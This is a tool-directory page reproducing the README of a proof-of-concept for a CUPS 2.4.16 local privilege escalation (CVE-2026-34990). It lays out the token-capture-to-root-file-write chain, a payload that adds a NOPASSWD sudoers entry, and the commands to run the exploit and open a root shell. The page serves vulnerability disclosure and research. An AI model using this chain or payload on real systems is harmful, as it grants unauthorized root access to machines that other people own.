Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-34990-CUPS-LPE-PoC — Generic PoC for CVE-2026-34990 - CUPS 2.4.16 Local Privilege Escalation via Local token disclosure and arbitrary root file overwrite. | Kitploit
Tools/GitHubGitHub/noorkhalel/cve-2026-34990-cups-lpe-poc
Privilege EscalationVulnerability AnalysisExploitationPenetration Testing
GitHubnoorkhalel/cve-2026-34990-cups-lpe-poc

CVE-2026-34990-CUPS-LPE-PoC

Generic PoC for CVE-2026-34990 - CUPS 2.4.16 Local Privilege Escalation via Local token disclosure and arbitrary root file overwrite.

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
22 days agoNot yet reviewed

CVE-2026-34990 | CUPS Local Privilege Escalation PoC

A generic proof-of-concept for CVE-2026-34990, a local privilege escalation vulnerability affecting CUPS 2.4.16.

The exploit demonstrates how a local unprivileged user can abuse CUPS local authentication and printer configuration behavior to obtain an arbitrary file write as root and escalate privileges.

Vulnerability

  • CVE: CVE-2026-34990
  • Component: CUPS
  • Tested Version: CUPS 2.4.16
  • Type: Local Privilege Escalation
  • Impact: Arbitrary file write as root
  • Fixed Version: CUPS 2.4.17

Vulnerability Credit

CVE-2026-34990 was originally reported by:

Asim Viladi Oglu Manizada (@manizada)

I am not the discoverer of this vulnerability.

This repository contains my adapted and tested proof-of-concept implementation based on publicly disclosed technical information.

How It Works

At a high level, the exploit chain is:

Local unprivileged user
        |
        v
Create temporary CUPS printer
        |
        v
Trigger outbound IPP authentication
        |
        v
Capture Authorization: Local token
        |
        v
Reuse token against privileged CUPS operations
        |
        v
Create/persist file:// printer
        |
        v
Submit print job
        |
        v
Root-owned arbitrary file write
        |
        v
Privilege escalation

The PoC uses the current local username automatically.

For example, when executed as:

alice

the demonstration payload targets:

/etc/sudoers.d/alice-pwn

and attempts to write:

alice ALL=(ALL) NOPASSWD: ALL

A successful exploit can then be verified with:

sudo -n id

Example:

uid=0(root) gid=0(root) groups=0(root)

Requirements

The PoC expects:

  • Linux
  • Python 3
  • Vulnerable CUPS installation
  • ipptool
  • lp
  • lpstat
  • Local access to the CUPS scheduler

Check the CUPS version:

cups-config --version

Check that the scheduler is running:

lpstat -r

Check the local CUPS listener:

ss -lnt | grep 631

Usage

Clone the repository:

git clone https://github.com/Noorkhalel/CVE-2026-34990-CUPS-LPE-PoC.git
cd CVE-2026-34990-CUPS-LPE-PoC

Run:

python3 exploit.py

Example output:

[*] user: <local-user>
[*] target: /etc/sudoers.d/<local-user>-pwn

[+] Local token: <LOCAL_TOKEN>

[*] attempt 1: <printer-name>

[+] ROOT via sudoers
uid=0(root) gid=0(root) groups=0(root)

[*] next: sudo -n bash

After successful exploitation:

sudo -n bash

Scope

This PoC is intentionally written as a generic implementation of the publicly disclosed CVE.

It does not contain:

  • CTF-specific information
  • Training-platform information
  • Machine names
  • Credentials
  • Flags
  • Target IP addresses
  • Environment-specific secrets

Disclaimer

This code is provided for:

  • Security research
  • Vulnerability reproduction
  • Defensive testing
  • Educational purposes
  • Authorized penetration testing

Only use this code on systems you own or systems for which you have explicit authorization.

The author is not responsible for misuse of this software.

Credits

Vulnerability discovery:
Asim Viladi Oglu Manizada (@manizada)

PoC adaptation, testing, and documentation:
Noor Khalil

References

  • CVE-2026-34990
  • OpenPrinting CUPS
  • OpenPrinting Security Advisory - GHSA-c54j-2vqw-wpwp
Download Tool